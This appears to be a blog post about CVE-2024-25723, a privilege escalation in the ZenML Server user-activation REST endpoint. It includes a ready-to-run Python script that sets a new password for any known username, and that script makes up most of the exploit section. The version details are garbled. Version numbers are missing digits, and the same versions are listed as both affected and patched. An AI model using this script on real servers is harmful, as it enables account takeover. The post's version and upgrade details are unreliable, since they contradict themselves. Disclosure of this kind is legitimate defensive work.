CVE-2024-25723: ZenML Server Remote Privilege Escalation Vulnerability in Machine Learning Package for Python

A critical vulnerability has been identified in the ZenML machine learning package for Python that allows remote privilege escalation. This vulnerability has been assigned the CVE identifier CVE-2024-25723 and affects ZenML Server versions before .46.7. This blog post will explore the details of this vulnerability, provide code snippets of the affected software, and discuss the patched versions provided by the ZenML team.

Vulnerability Details

The vulnerability exists in the ZenML Server, which is a component of the ZenML machine learning package for Python. Specifically, the remote privilege escalation issue affects the /api/v1/users/{user_name_or_id}/activate REST API endpoint. This endpoint allows access to users based on a valid username and a new password in the request body. Consequently, an attacker can exploit this vulnerability to gain unauthorized access and privileges on the targeted server.

Exploit Details

The exploit involves sending a specially-crafted HTTP request to the vulnerable REST API endpoint. By providing a valid username and a new password in the request body, an attacker can activate a new user account with elevated privileges, effectively granting the attacker administrative access to the ZenML Server.

Here is a code snippet demonstrating the exploit

import requests

# Replace the following placeholders with the target server's information
target_server = "http://[target-server-ip]:[port]";
user_name = "valid_username"
new_password = "new_password"

# Construct the API endpoint URL
api_endpoint = f"{target_server}/api/v1/users/{user_name}/activate"

# Craft the JSON payload with the new password
json_payload = {
    "password": new_password
}

# Send a POST request to the endpoint with the JSON payload
response = requests.post(api_endpoint, json=json_payload)

# Check if the request is successful
if response.status_code == 201:
    print("Success! User account activated with elevated privileges.")
else:
    print("Failed to activate the user account.")

The following ZenML Server versions are affected by this vulnerability

* Versions before .46.7
* .44.4
* .43.1
* .42.2

Patched Versions

To address this security issue, the ZenML team has released patched versions of the software. Users are advised to upgrade their ZenML Server installations to one of the following versions:

* .46.7
* .44.4
* .43.1
* .42.2

To upgrade your Python installation and apply the patches, use the following command

pip install zenml-server==version_number

Replace version_number with the appropriate patched version number listed above.

Original References

For more details about this vulnerability and the associated patches, please refer to the following references:

1. CVE-2024-25723 - MITRE CVE Dictionary Entry
2. ZenML GitHub Repository - Security Advisory
3. ZenML Documentation - Security Guide

Conclusion

Users of the ZenML machine learning package for Python are advised to upgrade their installations to the patched versions to address the remote privilege escalation vulnerability identified as CVE-2024-25723. By applying the patches, users can secure their ZenML Server deployments and protect their systems from unauthorized access and exploitation. Stay vigilant and ensure the security of your applications and infrastructure by regularly reviewing and applying security updates.

Timeline

Published on: 02/27/2024 15:15:07 UTC
Last modified on: 02/28/2024 14:07:00 UTC